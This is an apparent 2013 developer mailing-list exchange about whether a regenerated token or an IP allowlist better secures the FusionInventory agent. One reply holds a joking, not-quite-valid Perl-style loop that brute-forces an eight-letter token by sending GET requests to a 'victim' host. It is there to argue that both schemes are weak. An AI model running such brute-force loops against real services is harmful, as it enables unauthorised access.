Le 04/03/2013 10:46, David DURIEUX a écrit :
Le Mon, 04 Mar 2013 10:43:44 +0100
Guillaume Rousse <[email protected]> a écrit:
Le 04/03/2013 08:40, David DURIEUX a écrit :
For security reasons, habe token is more safe, and I prefer have a
token than allow the ip of the server.
Prove it.
It's more difficult to have the right token (regenerated at each
execution of agent) than have a computer with the IP of the trusted
server
Welcome to the real world.
my @alphabet = 'A' .. 'Z';
foreach my $a (@alphabet) {
foreach my $b (@alphabet) {
foreach my $c (@alphabet) {
foreach my $d (@alphabet) {
foreach my $e (@alphabet) {
foreach my $f (@alphabet) {
foreach my $g (@alphabet) {
foreach my $h (@alphabet) {
GET "http://victim:62354/now?token="$a$b$c$d$e$f$g$h";
&& print "look ma, I brute-forced the token";
}
}
}
}
}
}
}
}
On the other hand, the capacity of spoofing an IP adress is highly
dependant of local network configuration.
My point is just than both solutions are differently insecure, with the
token solution more cumbersome to implement. Given than there is
actually very few things an attacker would gain by defeating this
protection anyway, let's keep it simple and stupid.
--
BOFH excuse #338:
old inkjet cartridges emanate barium-based fumes
_______________________________________________
Fusioninventory-devel mailing list
[email protected]
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/fusioninventory-devel
